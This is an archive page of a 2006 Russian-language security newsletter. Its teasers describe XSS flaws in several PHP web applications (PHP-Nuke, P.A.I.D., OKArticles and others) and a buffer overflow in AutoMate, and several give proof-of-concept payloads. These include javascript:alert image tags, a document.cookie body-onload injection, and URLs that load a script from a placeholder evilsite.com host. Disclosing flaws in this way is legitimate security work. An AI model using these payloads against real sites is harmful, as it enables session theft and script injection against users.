Отправляет email-рассылки с помощью сервиса Sendsay

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в iFoto.

Компьютер для продвинутых пользователей В этом выпуске: iFoto ПО: iFoto Версия: 0.2 Сайт: http://ifoto.ireans.com/ Уязвимость: Путь директории показывается в 64 битной кодировке. Это можно использовать для XSS-атак. Использование: Код JavaScript используется в тегах. Например, [IFRAME SRC"javascript:alert'XSS);[/IFRAME] С использованием URL, http://www.example.com/?dir=Scene...

2006-06-22 15:46:04 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в P.A.I.D.

Компьютер для продвинутых пользователей В этом выпуске: P.A.I.D ПО: P.A.I.D Версия: 2.2 Уязвимость: Формы ввода находящиеся внутри My Account не проверяются. Для проведения XSS-атаки необходимо в поле ввода ввести: ><IMG SRC=javascript:alert'XSS> Использование : http://www.example.com/paid/faq.php?farea=2><img%20src=lol.jpg> http://example.com/paid/index.php?read=<IMG%20SRC=javascript:alert'XSS> Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермс...

2006-06-22 13:17:13 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в TinyMuw.

Компьютер для продвинутых пользователей В этом выпуске: TinyMuw ПО: TinyMuw Версия: 1.0 Уязвимость: Запросы на странице uickchat.php не проверяются до выполнения, что позволяет вставить любой скрипт-код. Использование: В комментарии вставьте javascript код. Например, <IMG SRC=javascript:alert'XSS> . Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

2006-06-22 11:54:16 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в AutoMate.

Компьютер для продвинутых пользователей В этом выпуске: AutoMate ПО: AutoMate Версия: 6.1.0.0 Уязвимость: Уязвимость позволяет скомпрометировать систему. Уязвимость происходит при работе библиотеки UNACEV2.DLL, когда происходит распаковка ACE архивов, содержащий длинные имена файлов. Это может быть использовано для переполнения буфера, когда пользователь распаковывает архив. Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ...

2006-06-22 07:05:43 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в SelectaPix.

Компьютер для продвинутых пользователей В этом выпуске: SelectaPix ПО: SelectaPix Версия: 1.31 Сайт: http://www.outofthetrees.co.uk/selectapix/index.php О SelectaPix: SelectaPix - это свободно распространяемая система для создания галерей, основанная на PHP/MySQL, которая поможет создать галерею за несколько минут. Защита пароля администраторской секции позволяет вам загружать до 10 jpeg изображений за один раз. Позволяет создавать альбомы и под-альбомы. Уязвимость: Обнаружена уязвимость позволяющая провес...

2006-06-21 18:05:09 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в phazizGuestbook.

Компьютер для продвинутых пользователей В этом выпуске: phazizGuestbook ПО: phazizGuestbook Версия: 2.0 Сайт: http://www.devhome.de/#english_version Уязвимость: Поля name, email, url, text не проверяються перед выполнением, что дает возможность вставить код. Использование: Вставляем код в поля. Пример кода: <IMG SRC=javascript:alert(...

2006-06-21 16:21:39 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в OKArticles.

Компьютер для продвинутых пользователей В этом выпуске: OKArticles ПО: OKArticles Версия: 1.0 Сайт: http://www.okscripts.com/ Уязвимость: Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно использовать для XSS атаки. Использование: В поле поиска введите код: IMG SRC=javascript:alert'XSS) Через ссылку: http://www.example.com/okarticles/demo/search.php?q[SCRIPT%20SRC=http://evilsite.com/xss.js[/SCRIPT] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информац...

2006-06-21 13:28:47 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в QuickLinks.

Компьютер для продвинутых пользователей В этом выпуске: QuickLinks ПО: QuickLinks Версия: 1.1 Сайт: http://www.okscripts.com/ Уязвимость: Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно использовать для XSS атаки. Использование: В поле поиска введите код: IMG SRC=javascript:alert'XSS) Через ссылку: http://www.example.com/quicklinks/demo/search.php?q[SCRIPT%20SRC=http://evilsite.com/xss.js[/SCRIPT] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информац...

2006-06-21 10:14:50 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в OkMall.

Компьютер для продвинутых пользователей В этом выпуске: OkMall ПО: OkMall Версия: 1.0 Уязвимость: Поле поиска не обрабатывается и не фильтруется до выполнения. Это можно использовать для XSS атаки. Использование: Через ссылку: http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20...

2006-06-21 07:05:24 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PHP-Nuke.

Компьютер для продвинутых пользователей В этом выпуске: PHP-Nuke ПО: PHP-Nuke Версия: 7.9 Использование: 1. Введите: http://[host]/modules.php?name=Search 2. В поиске: "><body onload"alert(document.cookie) Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

2006-06-20 18:05:09 + Комментировать